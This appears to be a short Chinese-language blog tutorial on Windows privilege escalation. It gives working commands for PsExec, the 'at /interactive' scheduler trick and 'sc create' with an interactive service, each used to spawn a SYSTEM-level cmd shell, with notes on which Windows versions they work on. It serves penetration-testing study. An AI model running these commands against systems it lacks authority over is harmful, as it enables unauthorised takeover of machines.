目录
一、权限分配
1.1、Windows:
User
Administrator
System
1.2、Linux
User
Root
二、PSTools提权
2.1、简介:
- PsExec - 远程执行进程
- PsFile - 显示远程打开的文件
- PsGetSid - 显示计算机或用户的 SID
- PsInfo - 列出有关系统的信息
- PsPing - 测量网络性能
- PsKill - 按名称或进程 ID 终止进程
- PsList - 列出有关进程的详细信息
- PsLoggedOn - 查看本地登录的用户以及通过资源共享 (完整源包含)
- PsLogList - 转储事件日志记录
- PsPasswd - 更改帐户密码
- PsService - 查看和控制服务
- PsShutdown - 关闭并选择性地重启计算机
- PsSuspend - 挂起进程
- PsUptime - 显示系统自上次重新启动以来运行的时间, PsUptime 的功能已合并到 PsInfo 中
2.2、微软官网:
- 客户端:Windows Vista 及更高版本。
- 服务器:Windows Server 2008 及更高版本
2.3、PsExec提权:
psexec.exe -accepteula -s -i -d notepad.exe
三、at命令提权
3.1、原理:
at命令是一个计划命令,通过调用的是system权限,可以在规定时间完成一些操作
3.2、适用版本:
都是古董了
Win2000 、 Win2003 、 XP(Win7以后没了)
3.3、利用过程:
获得一个低权限的用户----->通过3389端口远程连接----->使用at命令本地提权
#指定时间在5:20,生成一个交互式的System权限的cmd
#如果设定时间过时,将于次日执行
at 5:20 /interactive cmd.exe
(下图是win2003)
出现弹窗
(我利用win7的时候,是拒绝访问的)
四、sc命令提权
4.1、原理:
SC 是用于与服务控制管理器和服务进行通信的命令行程序
提供的功能类似于“控制面板”中“管理工具”项中的“服务”
4.2、适用版本:
windows 7、8
Windows 2003、2007、2008、2012、2016
4.3、利用过程:
# 创建一个名叫syscmd的新的交互式的cmd服务
sc Create syscmd binPath= "cmd /K start" type= own type= interact
# 运行服务,获得system权限的cmd环境
sc start syscmd(下图是win2003)
(win7也是拒绝访问的)